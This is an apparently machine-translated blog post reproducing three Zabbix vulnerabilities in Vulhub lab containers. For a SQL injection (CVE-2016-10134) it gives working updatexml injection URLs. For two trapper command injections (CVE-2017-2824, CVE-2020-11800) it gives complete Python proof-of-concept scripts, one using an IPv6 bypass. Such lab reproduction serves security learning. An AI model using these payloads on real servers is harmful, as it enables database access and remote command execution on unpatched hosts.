当前位置:网站首页>Vulhub vulnerability recurrence 77_ zabbix
Vulhub vulnerability recurrence 77_ zabbix
2022-07-04 06:56:00 【Revenge_ scan】
One 、 CVE-2016-10134_ zabbix latest.php SQL Inject holes
Vulnerability Details
zabbix Is a server monitoring software , The reason is server、agent、web And so on , among web Module by PHP To write , Used to display the results in the database .
Running environment
shooting range :192.168.4.10_ubuntu
Execute the following command to start zabbix 3.0.3:
#docker-compose up -d
After executing the command , Will start the database (mysql)、zabbix server、zabbix agent、zabbix web. If the memory is a little small , There may be a situation where a container hangs up , We can go through `docker-compose ps` View container status , And pass `docker-compose start` To restart the container .
A loophole is repeated
visit `http://your-ip:8080`, Account No `guest`( The password is empty. ) Login tourist account .
After logging in , see Cookie Medium `zbx_sessionid`, After copying 16 Bit character :
Will this 16 Characters for sid Value , visit `http://your-ip:8080/latest.php?output=ajax&sid=849cafc30fd8348b&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)`, It can be seen that the successful injection :
This vulnerability can also be passed jsrpc.php Trigger , And there is no need to log in :`http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)`:
The use environment comes with POC verification
During debugging, it is found that it can be carried out without user name and password sql Inject , See for implementation details POC.
#python3 CVE-2016-10134.py -t 127.0.0.1:8080
Two 、 CVE-2017-2824_ Zabbix Server trapper Command injection vulnerability
Vulnerability Details
Zabbix By Alexei Vladishev Developed a kind of network monitoring 、 Management system , be based on Server-Client framework . Its Server End trapper command There is a Code Execution Vulnerability in the function , Specific packets can cause command injection , Then execute the code remotely . An attacker can start from a Zabbix proxy Initiate request , Which triggers the vulnerability .
Reference link :
- https://talosintelligence.com/reports/TALOS-2017-0325
Environment building
Execute the following command to start a complete Zabbix Environmental Science , contain Web End 、Server End 、1 individual Agent and Mysql database :
#docker-compose up -d
After the execution of the command , perform `docker-compose ps` Check whether all containers are successfully started , without , You can try to execute again `docker-compose up -d`.
Exploit the vulnerability , You need to enable the automatic registration function on the server , So let's start the automatic registration function as an administrator . Use account password `admin/zabbix` Log in backstage , Get into Configuration->Actions, take Event source Adjusted for Auto registration, And then click Create action, Create a Action, Random names :
The third tab , Create a Operation,type yes “Add Host”:
preservation . This enables the automatic registration function , An attacker can register his server as Agent.
Loophole recurrence
Use this simple POC To replicate vulnerabilities :
```python
import sys
import socket
import json
import sys
def send(ip, data):
conn = socket.create_connection((ip, 10051), 10)
conn.send(json.dumps(data).encode())
data = conn.recv(2048)
conn.close()
return data
target = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))
for i in range(10000, 10500):
data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
if data and b'failed' not in data:
print('hostid: %d' % i)
print(data)
```
This POC It's junior , Please execute several more times , When you see the following results , It indicates that the command was executed successfully :
Get into server Containers , so `/tmp/success` Successfully created :
3、 ... and 、 CVE-2020-11800_Zabbix Server trapper Command injection vulnerability
Vulnerability Details
Zabbix By Alexei Vladishev Developed a kind of network monitoring 、 Management system , be based on Server-Client framework . stay [CVE-2017-2824][1] in , Its Server End trapper command There is a Code Execution Vulnerability in the function , The patch is not perfect , Lead to the availability of IPv6 Go around , Inject arbitrary commands .
Reference link :
- https://xz.aliyun.com/t/8991
Environment building
Execute the following command to start a complete Zabbix Environmental Science , contain Web End 、Server End 、1 individual Agent and Mysql database :
#docker-compose up -d
After the execution of the command , perform `docker-compose ps` Check whether all containers are successfully started , without , You can try to execute again `docker-compose up -d`.
Exploit the vulnerability , You need to enable the automatic registration function on the server , Please refer to [CVE-2017-2824][1].
Loophole recurrence
modify [CVE-2017-2824][1] Of POC Medium IP Field , Construct new POC:
```python
import sys
import socket
import json
import sys
def send(ip, data):
conn = socket.create_connection((ip, 10051), 10)
conn.send(json.dumps(data).encode())
data = conn.recv(2048)
conn.close()
return data
target = sys.argv[1]
print(send(target, {"request":"active checks","host":"vulhub","ip":"ffff:::;touch /tmp/success2"}))
for i in range(10000, 10500):
data = send(target, {"request":"command","scriptid":1,"hostid":str(i)})
if data and b'failed' not in data:
print('hostid: %d' % i)
print(data)
```
When you see the following results , It indicates that the command was executed successfully :
Get into server Containers , so `/tmp/success2` Successfully created :
边栏推荐
- Lottery system test report
- Tar source code analysis 8
- Responsive mobile web test questions
- [GF (q) + LDPC] regular LDPC coding and decoding design and MATLAB simulation based on the GF (q) field of binary graph
- Can the out of sequence message complete TCP three handshakes
- ABCD four sequential execution methods, extended application
- thread priority
- Analysis of tars source code 1
- 请问旧版的的常用SQL怎么迁移到新版本里来?
- [FPGA tutorial case 8] design and implementation of frequency divider based on Verilog
猜你喜欢
2022 wechat enterprise mailbox login entry introduction, how to open and register enterprise wechat enterprise mailbox?
[MySQL] introduction, function, creation, view, deletion and modification of database view (with exercises)
com. alibaba. nacos. api. exception. NacosException
selenium驱动IE常见问题解决Message: Currently focused window has been closed.
【问题记录】03 连接MySQL数据库提示:1040 Too many connections
用于压缩视频感知增强的多目标网络自适应时空融合
Flink memory model, network buffer, memory tuning, troubleshooting
【网络数据传输】基于FPGA的百兆网/兆网千UDP数据包收发系统开发,PC到FPGA
图的底部问题
Variables d'environnement personnalisées uniapp
随机推荐
Research on an endogenous data security interaction protocol oriented to dual platform and dual chain architecture
测试用例的设计
Mysql 45讲学习笔记(十三)表数据删掉一半,表文件大小不变
ABCD four sequential execution methods, extended application
Design of test cases
Tar source code analysis Part 2
【GF(q)+LDPC】基于二值图GF(q)域的规则LDPC编译码设计与matlab仿真
2022, peut - être la meilleure année économique de la prochaine décennie, avez - vous obtenu votre diplôme en 2022? Comment est - ce prévu après la remise des diplômes?
金盾视频播放器拦截的软件关键词和进程信息
Flink memory model, network buffer, memory tuning, troubleshooting
[GF (q) + LDPC] regular LDPC coding and decoding design and MATLAB simulation based on the GF (q) field of binary graph
ABCD four sequential execution methods, extended application
Fundamentals of SQL database operation
Lottery system test report
[MySQL] introduction, function, creation, view, deletion and modification of database view (with exercises)
GoogleChromePortable 谷歌chrome浏览器便携版官网下载方式
notepad++如何统计单词数量
Mysql 45讲学习笔记(七)行锁
2022 where to find enterprise e-mail and which is the security of enterprise e-mail system?
ADC voltage calculation of STM32 single chip microcomputer